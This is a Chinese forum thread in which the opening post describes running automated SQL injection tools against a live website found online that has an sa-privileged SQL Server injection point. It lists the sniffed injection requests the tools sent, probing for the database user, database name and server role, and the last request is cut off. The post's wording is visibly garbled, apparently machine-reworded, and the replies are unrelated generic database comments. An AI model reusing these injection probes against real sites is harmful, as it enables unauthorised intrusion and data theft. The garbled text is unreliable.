仓酷云

标题: MSSQL网页编程之实战:周全懂得SQLServer注进历程 [打印本页]

作者: 兰色精灵    时间: 2015-1-16 22:15
标题: MSSQL网页编程之实战:周全懂得SQLServer注进历程
提供用于管理、检查、优化数据库操作的管理工具。</p>想懂得sql注进的历程和道理,网上找了些文章,讲得都对照浅薄,可是我晓得有几款国际对照经常使用的注进工具,好比Domain3.5、NBSI3.0、啊D2.32、另有Pangolin、另有一些外洋的。这里任意弄几个来研讨一下就ok。此次用到的嗅探工具是sniffx专门嗅探http的数据包,功效不壮大,可是充足此次举动的利用。原本想利用ethereal或wireshark,可是内里复制数据包内容总是把没有转码的16进制也复制了过去,有点贫苦。也就是说这两个工具用得不纯熟。
【查询数据库信息】

当地没有找到好点的有注进毛病的体系,只幸亏网上寻觅了,先用Domain3.5,运转很好以来就找到个sqlserver,sa权限的注进点,点Domain3.5下面的“入手下手检测”
MSSQL网页编程之实战:周全懂得SQLServer注进历程
登录/注册后可看大图

以下是Domain3.5中嗅探出来的http数据包:
news_show.asp?id=15618%20and%201=1
news_show.asp?id=15618%20and%201=2
news_show.asp?id=15618%20and%20exists%20(select%20*%20from%20sysobjects)
news_show.asp?id=15618%20and%20char(124)%2Buser%2Bchar(124)=0
news_show.asp?id=15618;declare%20@a%20int&ndash;
news_show.asp?id=15618%20and%20char(124)%2Bdb_name()%2Bchar(124)=0
news_show.asp?id=15618%20And%20IS_SRVROLEMEMBER(0

作者: 柔情似水    时间: 2015-1-19 06:18
理解了存储结构,再阅读下性能优化的章节基本上会对sqlserver有个清晰地认识
作者: admin    时间: 2015-1-26 14:49
再开发调试阶段和OLAP环境中,外键是可以建立的。新版本中加入了SETNULL和SETDEFAULT属性,能够提供能好的级联设置。
作者: 飘灵儿    时间: 2015-2-4 18:48
多走走一此相关论坛,多看一些实例开发,多交流0经验,没什么的,我也是刚学没多久!加油
作者: 爱飞    时间: 2015-2-10 05:23
只能告诉你,学好数据库语言和原理,多见识几种数据库软件,比一棵树上吊死要好。
作者: 再见西城    时间: 2015-2-28 21:42
如果处理少量数据,比如几百条记录的数据,我不知道这两种情况哪个效率更高,如果处理大量数据呢?比如有表中有20万条记录.
作者: 兰色精灵    时间: 2015-3-10 08:31
其实可以做一下类比,Oracle等数据库产品老早就支持了java编程,而且提供了java池参数作为用户配置接口。但是现在有哪些系统大批使用了java存储过程?!连Oracle自己的应用都不用为什么?!




欢迎光临 仓酷云 (http://ckuyun.com/) Powered by Discuz! X3.2